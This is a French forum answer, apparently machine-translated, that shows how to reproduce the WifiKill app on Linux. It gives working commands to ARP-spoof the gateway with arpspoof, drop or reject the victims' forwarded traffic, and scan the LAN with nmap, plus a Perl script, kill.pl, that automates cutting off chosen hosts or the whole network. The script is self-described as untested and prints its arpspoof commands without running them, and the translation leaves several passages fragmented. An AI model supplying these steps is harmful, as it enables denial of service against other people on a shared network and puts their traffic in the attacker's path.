Existe-t-il un programme (de préférence Linux) similaire à l'application Android WifiKill?
Existe-t-il un programme (de préférence Linux) similaire à l'application Android WifiKill?
Réponses:
Eh bien, Android est Linux, donc vous pouvez reproduire les actions de ponury WifiKill
sur votre ordinateur Linux
WifiKill
fait deux choses:
Pour le masquage, vous avez besoin du spoofing ARP. Vous pouvez utiliser le arpspoof
commande de dsniff :
route -n
dans un terminal et obtenez l'adresse IP de la passerelle à partir de là. Dans le cas le plus courant (vous êtes uniquement connecté au réseau sans fil), la passerelle serait l’entrée avec Destination. 0.0.0.0
. Vous pouvez utiliser route -n|grep ^0.0.0.0|cut -d' ' -f 10
obtenir l'IP de la passerelle par défaut arpspoof
se faire passer pour la passerelle. Courir arpspoof $IP
en tant que root si vous voulez tuer tout le réseau sauf vous, ou exécuter arpspoof -t $VICTIM_IP $IP
pour chaque victime si vous voulez tuer seulement certains hôtes Maintenant, vous vous faites passer pour la passerelle du réseau. Tous les paquets envoyés par les victimes sont envoyés sur votre ordinateur. Vous devez maintenant désactiver le transfert de paquets. Pour faire cette course echo -n 0 > /proc/sys/net/ipv?/ip_forward
en tant que racine. Cela laissera tomber tous les paquets envoyés par les victimes
Ça fait longtemps que je n'ai pas utilisé WifiKill
, mais je me souviens qu’il y avait une option pour rejeter les paquets au lieu de les laisser tomber [le rejet donne aux gens une erreur de connexion instantanée, le fait de laisser toutes leurs connexions expirer]. Pour ce faire, vous devez:
echo -n 1 > /proc/sys/net/ipv?/ip_forward
comme racine netfilter
La politique FORWARD par défaut de REJECT. Courir iptables -P FORWARD REJECT
. Bien sûr, vous pouvez utiliser iptables
pour des règles de pare-feu arbitrairement complexes WifiKill
répertorie également les hôtes en ligne. Pour faire cela sous Linux, vous pouvez utiliser nmap
faire un ping sur des hôtes dans une plage donnée. Par exemple, si vous voulez savoir quels hôtes sont en ligne dans la gamme 192.168.1.1
à 192.168.1.254
tu peux courir nmap -sP 192.168.1.1-254
. Bien que cela ne répertorie pas les ordinateurs dotés de pare-feu «furtifs», vous pouvez toujours les tuer si vous tuez tout le monde sur le réseau ou si vous connaissez leur adresse IP exacte.
Il pourrait y avoir un programme là-bas faisant ce que j'ai énuméré ci-dessus, mais dans le cas le plus courant, vous pouvez écrire un script:
#!/usr/bin/perl -w
#This is untested code. Compiling works, but I haven't tested anything more
my $gw=`route -n|grep ^0.0.0.0|cut -d' ' -f 10`;
if (@ARGV) {
print "arpspoof -t $_ $gw &" for (@ARGV);
} else {
print "arpspoof $gw &";
}
system "echo 0 > $_" for(</proc/sys/net/ipv?/ip_forward>);
Enregistrer ceci sous kill.pl
puis appelez-le comme ./kill.pl $IP1 $IP2 ... $IPn
tuer $IP1
, $IP2
, ..., $IPn
ou comme ./kill.pl
tuer tous les hôtes